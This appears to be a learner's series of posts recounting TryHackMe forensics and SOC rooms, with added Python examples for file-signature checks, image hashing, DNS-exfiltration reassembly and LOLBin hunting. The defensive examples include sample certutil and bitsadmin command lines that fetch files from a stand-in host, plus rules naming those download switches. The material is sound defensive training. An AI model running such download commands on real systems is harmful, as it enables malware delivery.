DFIR Aspirant.

Joined October 2025
Today, I completed the Digital Forensics Case B4DM755 room on TryHackMe. I learnt about FTK Imager (Forensic Toolkit Imager), a tool used by forensic analysts to create exact copies of digital storage devices without altering the original evidence, ensuring it’s admissible in court. I used FTK Imager in a full end-to-end DFIR investigation, following proper evidence handling procedures from crime scene to court. I imaged a suspect’s flash drive, verified evidence integrity using MD5 and SHA1 hashes, and used ExifTool to identify a JPG disguised as a PDF. I also recovered deleted files, cracked a password-protected zip archive hidden inside a fake xlsx file, and uncovered GPS meetup coordinates, stolen HFT (High-Frequency Trading) source code from SwiftSpend Financial, dark web credentials, and a trust document naming Mr. Giovanni Vittorio DeVentura as the principal beneficiary. Finally, I learnt about the four phases of a real investigation: Pre-search, Search, Post-search, and Trial. This room gave me practical experience in handling digital evidence and showed me what it takes to build a forensic case that is admissible in court. tryhackme.com/room/caseb4dm7… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #DFIR #LearninginPublic
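The "JPG disguised as a PDF" and "zip hidden in a fake xlsx" findings in the B4DM755 post come down to one check: does the file's content signature agree with its extension? The Python below is an added example, not code from the room; ExifTool does the same with a far larger signature table, and the sample files are constructed in memory.

```python
"""Flag files whose content signature contradicts their extension."""
import io
import zipfile

# Magic-byte signatures for the container types the post mentions.
SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"%PDF-": "pdf",
    b"PK\x03\x04": "zip",
}

# Office Open XML files (.xlsx/.docx) are ZIP containers, so a "zip" hit is
# refined by looking for the part that every genuine workbook/document carries.
OOXML_MARKERS = {"xlsx": "xl/workbook.xml", "docx": "word/document.xml"}


def _refine_zip(data: bytes) -> str:
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = set(zf.namelist())
    except zipfile.BadZipFile:
        return "zip"  # looks like a zip header but does not parse as one
    for ext, marker in OOXML_MARKERS.items():
        if marker in names:
            return ext
    return "zip"


def detect_type(data: bytes) -> str:
    """Identify a file from its leading bytes, ignoring its name entirely."""
    for magic, name in SIGNATURES.items():
        if data.startswith(magic):
            return _refine_zip(data) if name == "zip" else name
    return "unknown"


def check_file(name: str, data: bytes) -> dict:
    """Compare the declared extension with the detected type."""
    declared = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    actual = detect_type(data)
    same = declared == actual or {declared, actual} <= {"jpg", "jpeg"}
    return {"name": name, "declared": declared, "actual": actual, "mismatch": not same}


def _make_zip(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for entry_name, content in entries.items():
            zf.writestr(entry_name, content)
    return buf.getvalue()


# Constructed sample files standing in for the suspect's flash drive contents.
SAMPLES = {
    "meetup.pdf": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",            # JPEG bytes named .pdf
    "report.pdf": b"%PDF-1.7\n%constructed\n",                     # genuine PDF header
    "q3_figures.xlsx": _make_zip({"secret/notes.txt": b"hidden"}),  # plain zip named .xlsx
    "budget.xlsx": _make_zip({"[Content_Types].xml": b"<x/>", "xl/workbook.xml": b"<w/>"}),
}


def scan(samples: dict = SAMPLES) -> list:
    return [check_file(n, d) for n, d in samples.items()]


if __name__ == "__main__":
    for r in scan():
        flag = "MISMATCH" if r["mismatch"] else "ok"
        print(f'{r["name"]:18} declared={r["declared"]:5} actual={r["actual"]:7} {flag}')
```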
I completed the KAPE room on TryHackMe today, where I learnt that KAPE (Kroll Artifact Parser and Extractor) is a forensic triage tool used to parse and extract Windows forensic artifacts. Instead of manually searching for artifacts, you define what to collect using Targets and how to process the collected data using Modules. Once a source drive is specified, KAPE automates the collection and parsing process. I explored KAPE both through its GUI and CLI interfaces and learnt how both can be used to perform forensic triage efficiently. I did a hands-on exercise, where I investigated a user who violated their company’s AUP (Acceptable Use Policy) by connecting unauthorized USB devices, installing software from a network drive, and connecting to unknown networks. Using KapeTriage together with !EZParser, I collected and parsed the system’s artifacts, then analyzed the resulting CSV files in EZViewer to answer the questions. tryhackme.com/room/kape?utm_… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
Today, I completed the Forensic Imaging room on TryHackMe. I learnt that forensic imaging is the process of creating an exact bit-by-bit copy of digital storage media, capturing everything including deleted files, hidden files, and unallocated space. The copy must be verifiable and admissible in court, which means maintaining chain of custody throughout. I also covered write-blockers, which prevent any modifications to the original evidence during acquisition. I did a practical hands-on exercise, where I was tasked to create an image of a 1GB loop device and generated the MD5 hash of the image to verify the integrity. I then mounted the image and extracted the flag from the file flag.txt, which confirmed the file system was accessible and the image could be successfully examined. tryhackme.com/room/forensici… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
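The acquire-then-hash-then-verify loop that the Forensic Imaging post and the B4DM755 post (MD5 and SHA1 verification) both describe, as an added Python example that is not code from either room. The "device" is a constructed temporary file; pointing `acquire` at a write-blocked device node works the same way but needs root, and the tamper step exists only to show a verification failure.

```python
"""Acquire a bit-for-bit image of a device or file and verify it by hash."""
import hashlib
import os
import tempfile
from datetime import datetime, timezone

BLOCK_SIZE = 4 * 1024 * 1024  # read in 4 MiB blocks, like dd's bs=4M


def _hashers() -> dict:
    return {"md5": hashlib.md5(), "sha1": hashlib.sha1(), "sha256": hashlib.sha256()}


def acquire(source: str, image: str) -> dict:
    """Copy source to image, hashing the bytes read in the same pass,
    and return the acquisition record an examiner would keep with the evidence."""
    hs = _hashers()
    size = 0
    with open(source, "rb") as src, open(image, "wb") as dst:
        while True:
            block = src.read(BLOCK_SIZE)
            if not block:
                break
            for h in hs.values():
                h.update(block)
            dst.write(block)
            size += len(block)
    return {"source": source, "image": image, "bytes": size,
            "acquired_at": datetime.now(timezone.utc).isoformat(),
            **{k: h.hexdigest() for k, h in hs.items()}}


def hash_file(path: str) -> dict:
    """Independent re-read of a file; this is what a verifier does later."""
    hs = _hashers()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(BLOCK_SIZE), b""):
            for h in hs.values():
                h.update(block)
    return {k: h.hexdigest() for k, h in hs.items()}


def verify(record: dict) -> bool:
    """True only if every hash taken at acquisition matches a fresh hash of the image."""
    fresh = hash_file(record["image"])
    return all(fresh[k] == record[k] for k in fresh)


def demo() -> tuple:
    """Image a constructed 3 MiB 'device', verify, then show a tampered image failing."""
    tmp = tempfile.mkdtemp()
    src = os.path.join(tmp, "loop0.bin")
    img = os.path.join(tmp, "evidence.dd")
    with open(src, "wb") as f:  # constructed sample: patterned data, not real evidence
        f.write(bytes(range(256)) * (3 * 4096))
    record = acquire(src, img)
    ok_before = verify(record)
    with open(img, "r+b") as f:  # flip one byte to simulate post-acquisition alteration
        f.seek(1024)
        original = f.read(1)
        f.seek(1024)
        f.write(b"\x00" if original != b"\x00" else b"\x01")
    ok_after = verify(record)
    return record, ok_before, ok_after


if __name__ == "__main__":
    rec, before, after = demo()
    print(f"imaged {rec['bytes']} bytes  md5={rec['md5']}  sha1={rec['sha1']}")
    print("verification right after acquisition:", before)
    print("verification after one byte changed:  ", after)
```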
I completed the Intro to Cold System Forensics room on TryHackMe today. I learnt how DFIR teams examine powered-off or dormant systems and the key differences between cold system forensics and live system forensics. I covered important concepts such as the order of volatility, disk imaging with write blockers, and chain of custody practices used to preserve evidence integrity. I also explored key tools used in acquisition like dd/dc3dd, Guymager, and FTK Imager, as well as analysis tools like The Sleuth Kit, Autopsy, EnCase, and Magnet AXIOM. Finally, I completed an exercise where I arranged forensic data by volatility order and filled out a proper chain of custody record to capture a disk image from a breached web server. tryhackme.com/room/introtoco… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
Today, I completed the Legal Considerations in DFIR room on TryHackMe. I covered ethical decision-making, legal compliance frameworks (SOX, CFAA), rules of evidence across different jurisdictions, and what makes digital evidence admissible in court. I also investigated a corporate fraud incident at SwiftSpend Finance, where a CFO’s credit card was used in an unauthorized $9k transaction. I traced the attack through Outlook emails, identified the person of interest (POI), and analyzed Exchange Server IIS logs to find unauthorized remote logins from a Linux machine using Firefox. Finally, I examined the actual log files, identified the anomalous IP address, and confirmed the compromised account. I then performed Chain of Custody procedures by retrieving the verified SHA1 hashes of the IIS log files and the POI’s OST file to prove evidence integrity. tryhackme.com/room/dfirproce… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
Throughout the weekend, I rested and revised the previous week’s work. Today, I read chapters 3 and 4 of the Digital Forensics Handbook by Lucas Mahler. Chapter 3 covers The DFIR Toolkit, where I learnt that every forensic examiner needs the right operating system and tools. Linux-based distributions like CAINE and Parrot OS are built for forensic work, and help preserve evidence integrity by mounting drives as read-only by default. I also covered key tools like The Sleuth Kit for file system forensics, Volatility for memory analysis, dcfldd/dc3dd for forensic imaging, Xplico for PCAP/network analysis, and dd as the classic disk utility. Chapter 4 covers the Investigation Checklist. I learnt that a proper DFIR examination follows a strict process: verify legal authority first, document everything, maintain chain of custody, and never make assumptions. Your report must be reproducible by anyone who picks it up. Another important rule I learnt is: “If it wasn’t documented, it didn’t happen”. @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
Today I’m still going through the fundamentals of Digital Forensics and Incident Response (DFIR). I completed the DFIR: An Introduction room on TryHackMe. I covered what DFIR is, core concepts like artifacts, evidence preservation, chain of custody, order of volatility, and timeline creation. I learnt about key tools used in the field, which include Eric Zimmerman’s tools, Autopsy, Volatility, KAPE, Velociraptor, and Redline. I also learnt about the incident response lifecycle, which consists of Preparation, Identification, Containment, Eradication, Recovery and Lessons Learned, and how it maps to the NIST and SANS incident response frameworks. tryhackme.com/room/introduct… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
Today, I completed the TryHackMe Intro to Digital Forensics room. I learnt that digital forensics is the application of computer science to investigate digital evidence for a legal purpose. I also learnt how digital forensics applies to both public-sector (law enforcement) and private-sector (corporate) investigations, and why proper evidence handling, such as establishing a chain of custody, creating forensic copies, and using validated tools matter a lot in this field. I did a practical exercise where I used pdfinfo to extract PDF metadata and identified the document author. Then I also used exiftool on a JPEG to pull embedded EXIF (Exchangeable Image File Format) metadata which includes GPS coordinates and camera model. tryhackme.com/room/introdigi… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
Over the last few days, I was able to complete the SOC L1 learning path on TryHackMe, and earned the certificate. It was a great opportunity to strengthen my understanding of how Security Operations Centers (SOC) identify, investigate, and respond to security incidents. On to the next one. @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
Today on TryHackMe, I completed the Boogeyman 3 challenge room, where I traced a full enterprise attack chain using ELK. The attacker sent a phishing email to the CEO with a fake PDF that was actually an ISO file containing a malicious HTA. From there it was clear that mshta.exe executed the payload, a DLL was dropped and run via rundll32, persistence was set via a scheduled task, and C2 communication was established over port 80. The attacker then bypassed UAC using fodhelper.exe, downloaded Mimikatz from GitHub, dumped credentials, and moved laterally across machines using Pass-the-Hash. They eventually reached the Domain Controller, ran a DCSync attack to dump AD hashes, and deployed ransomware. I learnt that every action a threat actor takes leaves a trace in the logs. tryhackme.com/room/boogeyman… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
I completed the Boogeyman 2 challenge room, where I was tasked with investigating a phishing attack involving macro malware and memory forensics. The scenario involved an HR specialist who received a fake job application email. The attached Microsoft Word document contained a malicious VBA macro that silently downloaded and executed a malicious JavaScript file, which then retrieved a malware binary that established a C2 connection to a remote attacker server. Using olevba, I extracted the malicious macro and identified the download URLs used to deliver the payloads. Then I used Volatility3 to analyze the memory dump, tracing the full process tree from WINWORD.EXE → wscript.exe → updater.exe. Through memory analysis, I identified the attacker’s C2 IP address and port, and uncovered a scheduled task the attacker planted for daily persistence using a Base64-encoded PowerShell payload hidden in the registry. I was able to learn that a single malicious email attachment can give an attacker full control of a system. As defenders, disabling macros by default and training employees to recognize phishing emails remains one of the most effective defences against this attack vector. tryhackme.com/room/boogeyman… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
Today on TryHackMe, I completed the Boogeyman 1 challenge room. The scenario involved investigating a phishing attack on a finance employee from initial email delivery all the way to data exfiltration. During the investigation, I analysed a raw .eml file to identify the attacker’s spoofed domain, extracted a password-protected ZIP archive containing a malicious LNK file disguised as an Excel document, and used lnkparse to uncover a hidden PowerShell payload inside it. From there I examined PowerShell logs with jq to reconstruct the full attack chain and analyzed network traffic using Wireshark and Tshark to confirm C2 communication. I also reconstructed the hex-encoded data hidden inside DNS queries to recover a stolen KeePass vault containing a credit card number. The key tools I used during the investigation were Thunderbird, lnkparse, jq, Wireshark, and Tshark. I also learnt that attackers don't always rely on obvious or loud methods. DNS traffic can be abused for data exfiltration while blending in with legitimate network activity, making it an important source of evidence during investigations. tryhackme.com/room/boogeyman… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
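The DNS reconstruction step from the Boogeyman 1 post, as an added Python example that is not the room's code: hex labels carried in query names are collected per frame, de-duplicated against DNS retries, ordered and decoded, and the result is checked against a few file signatures (the KeePass 2.x kdbx magic among them). The input is constructed tshark-style field output for a made-up attacker domain, and the payload is constructed as well.

```python
"""Reassemble data that was exfiltrated as hex-encoded labels in DNS queries."""
import re

# A hex label is an even-length run of hex digits forming a whole DNS label.
HEX_LABEL = re.compile(r"^(?:[0-9a-fA-F]{2})+$")

# Signatures worth recognising in the reassembled bytes.
KNOWN_MAGIC = {
    b"\x03\xd9\xa2\x9a\x67\xfb\x4b\xb5": "KeePass 2.x database (kdbx)",
    b"PK\x03\x04": "zip container",
    b"%PDF-": "PDF",
}


def parse_tshark_line(line: str):
    """Return (frame, qname) for one line of
    `tshark -T fields -e frame.number -e frame.time_relative -e ip.src -e ip.dst -e dns.qry.name`."""
    parts = line.strip().split("\t")
    if len(parts) != 5 or not parts[0].isdigit():
        return None
    return int(parts[0]), parts[4].lower().rstrip(".")


def extract_chunks(lines, exfil_domain: str) -> list:
    """Return [(frame, hexdata)] for queries under exfil_domain, sorted by frame.
    An identical query seen again is treated as a DNS retry and counted once."""
    exfil_domain = exfil_domain.lower().rstrip(".")
    first_seen = {}
    for line in lines:
        parsed = parse_tshark_line(line)
        if not parsed:
            continue
        frame, qname = parsed
        if not qname.endswith("." + exfil_domain) or qname in first_seen:
            continue
        labels = qname[: -len(exfil_domain) - 1].split(".")
        hex_labels = [lab for lab in labels if HEX_LABEL.match(lab)]
        if hex_labels:
            first_seen[qname] = (frame, "".join(hex_labels))
    return sorted(first_seen.values())


def reconstruct(lines, exfil_domain: str) -> bytes:
    """Concatenate the ordered hex chunks and decode them back into bytes."""
    return bytes.fromhex("".join(h for _, h in extract_chunks(lines, exfil_domain)))


def identify(data: bytes) -> str:
    for magic, name in KNOWN_MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


# Constructed capture: normal lookups with exfil queries interleaved, plus one retry.
# The payload is a fake kdbx header followed by marker text, 8 bytes per label.
_PAYLOAD = b"\x03\xd9\xa2\x9a\x67\xfb\x4b\xb5" + b"constructed-vault-bytes"
_HEX = _PAYLOAD.hex()
_LABELS = [_HEX[i:i + 16] for i in range(0, len(_HEX), 16)]
_EXFIL = ".c2.evil-example.test"
SAMPLE_LINES = [
    "1\t0.000\t10.0.0.5\t10.0.0.1\twww.example.com",
    "2\t0.010\t10.0.0.5\t10.0.0.1\t" + _LABELS[0] + _EXFIL,
    "3\t0.020\t10.0.0.5\t10.0.0.1\tupdates.example.org",
    "4\t0.030\t10.0.0.5\t10.0.0.1\t" + _LABELS[1] + _EXFIL,
    "5\t0.031\t10.0.0.5\t10.0.0.1\t" + _LABELS[1] + _EXFIL,  # retry of frame 4
    "6\t0.040\t10.0.0.5\t10.0.0.1\t" + _LABELS[2] + _EXFIL,
    "7\t0.050\t10.0.0.5\t10.0.0.1\t" + _LABELS[3] + _EXFIL,
]

if __name__ == "__main__":
    data = reconstruct(SAMPLE_LINES, "c2.evil-example.test")
    print(len(data), "bytes recovered, identified as:", identify(data))
```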
I wasn’t able to post yesterday, because I struggled to finish this room, but today I was able to complete the Tempest challenge room on TryHackMe. In this room, I was assigned the role of an Incident Responder to investigate through an entire attack chain from initial access to full system compromise. During the investigation, I discovered that the threat actor gained access through a malicious Microsoft Word document exploiting Follina (CVE-2022-30190). No malicious code was needed, just opening the file was enough to trigger code execution. The document silently downloaded malware written in Nim that communicated back to a C2 server using base64-encoded HTTP traffic to blend in with normal web activity. Once inside, the attacker ran reconnaissance commands through the C2, found a credentials file containing a plaintext password, and then used Chisel to set up a reverse SOCKS proxy for stable access. From there they exploited SeImpersonatePrivilege using PrintSpoofer to escalate all the way to SYSTEM. With full control of the machine, the attacker created backdoor accounts, changed the Administrator password and installed a persistent Windows service to maintain access after reboots. The tools I used during the investigation are: SysmonView, Timeline Explorer, EvtxECmd, Brim, Wireshark, VirusTotal (used to search up the hashes and see the tool/malware associated with it), and CyberChef. The key lesson I learnt is that a single document opened by one user was enough for the threat actor to take over the entire system. This highlights the importance of defense-in-depth strategies, security awareness, and effective log monitoring to detect and respond to threats before they escalate. tryhackme.com/room/tempestin… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
Today on TryHackMe, I completed the Benign challenge room, where I investigated a compromised host using Splunk. I was given host-centric logs to find suspicious process execution from March 2022 and piece together exactly what happened on the system. During the investigation, I discovered an imposter account hiding among HR department users, identified a user running a suspicious scheduled task, and found that a user named Haroon abused a built-in Windows tool (certutil.exe) to silently download a malicious file from the internet. This technique is known as a LOLBin (Living Off the Land Binary) attack, where legitimate system tools are abused for malicious purposes. The downloaded file was benign.exe pulled from controlc[.]com, and I also recovered the hidden THM flag within it. I learnt that threat actors don’t always break in loudly. Sometimes they blend in by abusing trusted tools that already exist on the system, making detection much more difficult. tryhackme.com/room/benign?ut… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
I completed the ItsyBitsy challenge room today on TryHackMe, where I investigated a potential C2 communication alert using Kibana and Elastic SIEM. I analyzed 1,482 HTTP connection logs from March 2022 to trace suspicious activity from an HR department machine. During the investigation, I discovered that the malware was using bitsadmin, a legitimate Windows binary, to silently download a file called secret.txt from pastebin[.]com. The attackers abused this trusted file-sharing platform as a C2 server to blend malicious traffic with normal network activity. The file also contained a secret code, confirming active C2 communication. I was able to understand that threat actors abuse trusted platforms like Pastebin to evade detection. Also I learnt that as an analyst, it is important to monitor outbound HTTP traffic carefully, even when connections are made to legitimate websites. tryhackme.com/room/itsybitsy… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
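The LOLBin downloads found in the Benign post (certutil.exe) and the ItsyBitsy post (bitsadmin) are the kind of thing a SIEM hunt query catches from process-creation events: trusted binary plus download switch plus an outbound URL. The Python below is an added example, not code from either room; it runs over a constructed CSV export of Sysmon Event ID 1 fields (the column layout, hosts, users and URLs are all made up), and the technique IDs are MITRE ATT&CK.

```python
"""Flag LOLBin download activity (certutil, bitsadmin) in process-creation logs."""
import csv
import io
import re

URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Per-binary rules: a hit needs the binary AND one of its download/decode switches.
LOLBIN_RULES = {
    "certutil.exe": {
        "switches": ("-urlcache", "/urlcache", "-split", "/split", "-decode", "/decode"),
        "technique": "certutil download/decode (T1105/T1140)",
    },
    "bitsadmin.exe": {
        "switches": ("/transfer", "/addfile", "/create"),
        "technique": "bitsadmin download (T1197)",
    },
}


def classify(image: str, cmdline: str):
    """Return (technique, url) when the command line matches a LOLBin download pattern."""
    binary = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    rule = LOLBIN_RULES.get(binary)
    if not rule:
        return None
    low = cmdline.lower()
    if not any(sw in low for sw in rule["switches"]):
        return None
    m = URL.search(cmdline)
    is_decode = binary == "certutil.exe" and "decode" in low
    if not m and not is_decode:
        return None  # download switch but no URL: a local cache/job operation, not a web fetch
    return rule["technique"], (m.group(0) if m else None)


def hunt(csv_text: str) -> list:
    """Run classify over every row; return the fields an analyst pivots on."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        hit = classify(row["Image"], row["CommandLine"])
        if hit:
            findings.append({"time": row["UtcTime"], "host": row["Computer"], "user": row["User"],
                             "technique": hit[0], "url": hit[1], "cmd": row["CommandLine"]})
    return findings


# Constructed Sysmon-style export: routine admin activity mixed with two LOLBin downloads.
SAMPLE_CSV = r"""UtcTime,Computer,User,Image,CommandLine
2022-03-04 22:00:01,HR-PC-07,CORP\hr_analyst,C:\Windows\System32\certutil.exe,"certutil.exe -urlcache -split -f https://paste.example.test/raw/abcd benign.exe"
2022-03-04 22:05:13,HR-PC-07,CORP\hr_analyst,C:\Windows\System32\certutil.exe,"certutil -verify corp-ca.cer"
2022-03-04 22:07:40,HR-PC-11,CORP\hr_intern,C:\Windows\System32\bitsadmin.exe,"bitsadmin /transfer job1 https://paste.example.test/raw/secret.txt C:\Users\Public\secret.txt"
2022-03-04 22:09:02,HR-PC-11,CORP\hr_intern,C:\Windows\System32\bitsadmin.exe,"bitsadmin /list"
2022-03-04 22:10:55,HR-PC-02,CORP\finance1,C:\Windows\System32\cmd.exe,"cmd.exe /c dir"
"""

if __name__ == "__main__":
    for f in hunt(SAMPLE_CSV):
        print(f"{f['time']} {f['host']} {f['user']:16} {f['technique']:40} {f['url']}")
```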
Today on TryHackMe, I completed the Alert Triage With Elastic room. I performed a hands-on investigation using Kibana to search and filter both web and Windows logs, and identified key indicators of compromise (IoCs) across multiple log sources. I investigated a full attack chain, starting from a ProxyLogon web exploit to a web shell deployment, RDP login, backdoor account creation, PowerShell reconnaissance, and finally data staging with Rar.exe. One important lesson I learnt was that no alert was triggered for the final stage, which shows why analysts cannot rely on alerts alone. Finally, I practiced correlating Security and Sysmon logs, writing KQL (Kibana Query Language) queries, and building evidence tables to trace attacker activity step by step. tryhackme.com/room/alerttria… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
I completed the Alert Triage with Splunk room on TryHackMe today, where I investigated 3 real-world SOC alert scenarios using Splunk as the SIEM. Scenario 1 - Linux Brute Force: I traced a brute force attack on SSH, found 591 failed login attempts, and saw that the attacker gained access after 5 mins, escalated privileges to root, and created a persistence account (system-utm). Scenario 2 - Windows Persistence: I investigated a suspicious scheduled task on a Windows host and traced it to cmd.exe; I found that the attacker scanned the Administrators group and logged in from DEV-QA-SERVER. Scenario 3 - Web Shell: I identified Hydra brute forcing a WordPress login. The attacker uploaded b374k.php as a web shell through the theme editor and executed 4 commands through it. I learnt that logs tell the full story if you know what to query, and that Splunk makes it easier to correlate events across Linux, Windows, and web servers. tryhackme.com/room/alerttria… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
Yesterday I rested and revised the previous week’s work. Today I completed the Log Analysis with SIEM room on TryHackMe. I learnt about the benefits of SIEM for analysts, which include centralization, correlation, historical event analysis, visualization, detection rules, and automation workflows. I was given 3 real-world scenarios to analyze using Splunk: 1) Windows Logs: I traced a suspicious connection on port 5678 to a masquerading process (SharePoInt.exe in C:\Windows\Temp), retrieved its MD5 hash, and uncovered a scheduled task used for persistence. 2) Linux Logs: I investigated an unauthorized SSH access on an Ubuntu server, identified the user who escalated to root, and found a Python reverse shell cron job as the persistence mechanism. 3) Web Application Logs: I analyzed a spike in web server activity and identified the source IP and tool used by the threat actor. Also, I was able to learn how to use SPL queries and EventCodes for threat hunting. tryhackme.com/room/loganalys… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
Today I completed a Threat Intel investigation room on TryHackMe. I investigated two suspicious indicators flagged by an L1 analyst: a suspicious IP and a SHA256 hash. Using a threat intelligence tool called TryDetectThis2.0, I analyzed both indicators, traced files and parent processes linked to the SHA256 hash, and identified malicious files associated with the flagged IP. I also used OSINT (Google) to find the original threat report behind the campaign: “From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery”. The attackers used a phishing technique called ClickFix to trick victims into running the malware themselves, and a tool called ChromeKatz to steal browser cookies. Victims were then redirected to malicious servers through Discord. tryhackme.com/room/invite-on… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
Today on TryHackMe, I completed two rooms: File & Hash Threat Intel and IP & Domain Threat Intel. I learnt how to investigate suspicious files and hashes using hash lookups and sandbox analysis to identify malware behaviour and indicators of compromise (IOCs). Also, I learnt how to investigate suspicious IPs and domains using DNS records, ASN details, geolocation, and reputation checks to identify malicious activity. tryhackme.com/room/fileandha… tryhackme.com/room/ipanddoma… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic
Today on TryHackMe, I completed the Intro to Cyber Threat Intelligence room. I learnt that Cyber Threat Intelligence (CTI) is the process of collecting and analyzing information about cyber threats so analysts can better understand, detect, and respond to attacks. I also learnt about CTI basics, where I explored the differences between raw data, information, and intelligence, as well as IOCs, IOAs, and TTPs. I went further to learn about the CTI Lifecycle, which consists of 6 phases: Direction, Collection, Processing, Analysis, Dissemination, and Feedback. I completed an exercise where I analyzed a real alert chain and extracted several IOCs, including a phishing email, a malicious executable, registry-based persistence, and data exfiltration to a suspicious IP address. I was able to understand that CTI transforms an artifact, such as a suspicious IP address, from simple raw data into actionable intelligence that analysts can use to block threats, investigate incidents and escalate findings when necessary. tryhackme.com/room/cyberthre… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic